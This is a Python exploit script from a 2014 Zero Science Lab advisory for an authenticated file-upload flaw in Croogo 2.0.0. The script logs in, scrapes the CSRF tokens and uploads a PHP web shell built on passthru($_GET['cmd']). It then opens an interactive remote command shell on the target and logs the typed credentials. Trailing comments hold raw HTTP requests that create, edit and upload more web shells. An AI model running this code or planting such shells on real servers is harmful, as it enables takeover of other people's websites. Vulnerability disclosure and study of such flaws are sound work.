#!/usr/bin/env python # # # Croogo 2.0.0 Arbitrary PHP Code Execution Exploit # # # Vendor: Fahad Ibnay Heylaal # Product web page: http://www.croogo.org # Affected version: 2.0.0 # # Summary: Croogo is a free, open source, content management system # for PHP, released under The MIT License. It is powered by CakePHP # MVC framework. # # Desc: Croogo suffers from an authenticated arbitrary PHP code # execution. The vulnerability is caused due to the improper # verification of uploaded files in '/admin/file_manager/attachments/add' # script thru the 'data[Attachment][file]' POST parameter and in # '/admin/file_manager/file_manager/upload' script thru the # 'data[FileManager][file]' POST parameter. This can be exploited # to execute arbitrary PHP code by uploading a malicious PHP script # file that will be stored in '/webroot/uploads/' directory. # # Tested on: Apache/2.4.7 (Win32) # PHP/5.5.6 # MySQL 5.6.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Zero Science Lab - http://www.zeroscience.mk # Macedonian Information Security Research And Development Laboratory # # # Advisory ID: ZSL-2014-5202 # Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5202.php # # Vendor: http://blog.croogo.org/blog/croogo-210-released # # # 26.07.2014 # # version = '5.0.0.251' import itertools, mimetools, mimetypes import cookielib, urllib, urllib2, sys import logging, os, time, datetime, re from colorama import Fore, Back, Style, init from cStringIO import StringIO from urllib2 import URLError init() if os.name == 'posix': os.system('clear') if os.name == 'nt': os.system('cls') piton = os.path.basename(sys.argv[0]) def bannerche(): print ''' @---------------------------------------------------------------@ | | | Croogo 2.0.0 Arbitrary PHP Code Execution Exploit | | | | | | ID: ZSL-2014-5202 | | | | Copyleft (c) 2014, Zero Science Lab | | | @---------------------------------------------------------------@ ''' if len(sys.argv) < 3: print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n' print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk croogo\n' sys.exit() bannerche() print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET host = sys.argv[1] path = sys.argv[2] cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) try: getcsrf = opener.open('http://'+host+'/'+path+'/admin/users/users/login') csrf = getcsrf.read() except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET print sys.exit() print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET token_key = re.search(r'\[key\]\" value=\"(.+?)\"', csrf).group(1) print '\x20\x20[*] Retrieving login CSRF token '+'.'*27+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Login CSRF token: '+Fore.YELLOW+token_key+Fore.RESET print '\x20\x20[*] Login please.' username = raw_input('\x20\x20[*] Enter username: ') password = raw_input('\x20\x20[*] Enter password: ') login_data = urllib.urlencode({ '_method' : 'POST', 'data[User][password]' : password, 'data[User][remember]' : '0', 'data[User][username]' : username, 'data[_Token][fields]' : '93365ba06ce101995d3cd9c79cce968b12fb6ee5:', 'data[_Token][key]' : token_key, 'data[_Token][unlocked]' : '' }) login = opener.open('http://'+host+'/'+path+'/admin/users/users/login', login_data) auth = login.read() for session in cj: sessid = session.name print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET ses_chk = re.search(r'%s=\w+' % sessid , str(cj)) cookie = ses_chk.group(0) print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET if re.search(r'Incorrect username or password', auth): print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET print sys.exit() else: print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET getcsrfattach = opener.open('http://'+host+'/'+path+'/admin/file_manager/attachments/add') csrfattach = getcsrfattach.read() token_key2 = re.search(r'\[key\]\" value=\"(.+?)\"', csrfattach).group(1) print '\x20\x20[*] Retrieving upload CSRF token '+'.'*26+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Upload CSRF token: '+Fore.YELLOW+token_key2+Fore.RESET class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('_method', 'POST') form.add_field('data[_Token][key]', token_key2) form.add_field('data[_Token][fields]', 'c0c3f5d102d9672429f5c571a5f45c34255a93a9%3A') form.add_field('data[_Token][unlocked]', '') form.add_file('data[Attachment][file]', 'zsl.php', fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>')) request = urllib2.Request('http://'+host+'/'+path+'/admin/file_manager/attachments/add') request.add_header('User-agent', 'joxypoxy 5.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read() print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET time.sleep(1) furl = '/uploads/zsl.php' #furl = '/webroot/uploads/zsl.php' print today = datetime.date.today() fname = 'croogo-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log' logging.basicConfig(filename=fname,level=logging.DEBUG) logging.info(' '+'+'*75) logging.info(' +') logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')) logging.info(' + Title: Croogo 2.0.0 Arbitrary PHP Code Execution Exploit') logging.info(' + Python program executed: '+sys.argv[0]) logging.info(' + Version: '+version) logging.info(' + Full query: \''+piton+'\x20'+host+'\'') logging.info(' + Username input: '+username) logging.info(' + Password input: '+password) logging.info(' + Vector: '+'http://'+host+'/'+path+furl) logging.info(' +') logging.info(' + Advisory ID: ZSL-2014-5202') logging.info(' + Zero Science Lab - http://www.zeroscience.mk') logging.info(' +') logging.info(' '+'+'*75+'\n') print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET raw_input() while True: try: cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET) execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd)) reverse = execute.read() pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M) print Style.BRIGHT+Fore.CYAN cmdout = pattern.match(reverse) print cmdout.groups()[0].strip() print Style.RESET_ALL+Fore.RESET if cmd.strip() == 'exit': break logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n') except Exception: break logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG') print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET print sys.exit() # ## OTHER ## # # # Arbitrary file creation any location: # # - http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A\xampp\htdocs\croogo\ # # # Arbitrary file upload any location: # - http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5C # # ########### # # POST /croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C # Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84 # Connection: keep-alive # Content-Type: application/x-www-form-urlencoded # Content-Length: 229 # # _method=POST&data%5B_Token%5D%5Bkey%5D=4f20867747cbff33951db804266494804e96bf89&data%5BFileManager%5D%5Bname%5D=shell2.php&data%5B_Token%5D%5Bfields%5D=4aeda1af05803a2ae8503d6033160c17d6335641%253A&data%5B_Token%5D%5Bunlocked%5D= # ########### # # POST /croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://localhost/croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php # Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84 # Connection: keep-alive # Content-Type: application/x-www-form-urlencoded # Content-Length: 304 # # _method=POST&data%5B_Token%5D%5Bkey%5D=5a6516e263eb6e5504e2266783b42cd08e3efe16&data%5BFileManager%5D%5Bcontent%5D=test%0D%0A%3C%3Fphp%0D%0Apassthru%28%24_GET%5B%27cmd%27%5D%29%3B%0D%0A%3F%3E%0D%0A&data%5B_Token%5D%5Bfields%5D=8f1bb3e7acda642ca69ee0430abba1f5ecd5f7a7%253A&data%5B_Token%5D%5Bunlocked%5D= # ########### # # POST /croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-US,en;q=0.5 # Accept-Encoding: gzip, deflate # Referer: http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C # Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84 # Connection: keep-alive # Content-Type: multipart/form-data; boundary=---------------------------25555888422431 # Content-Length: 779 # # -----------------------------25555888422431 # Content-Disposition: form-data; name="_method" # # POST # -----------------------------25555888422431 # Content-Disposition: form-data; name="data[_Token][key]" # # 0d940d3b3f4c80ea98b3e5588c337587f7c50d5e # -----------------------------25555888422431 # Content-Disposition: form-data; name="data[FileManager][file]"; filename="exploit.php" # Content-Type: application/octet-stream # # test # <?php # passthru($_GET['cmd']); # ?> # # -----------------------------25555888422431 # Content-Disposition: form-data; name="data[_Token][fields]" # # 6f3f788048d33beefcc340fe281cf758e20ad329%3A # -----------------------------25555888422431 # Content-Disposition: form-data; name="data[_Token][unlocked]" # # # -----------------------------25555888422431-- # #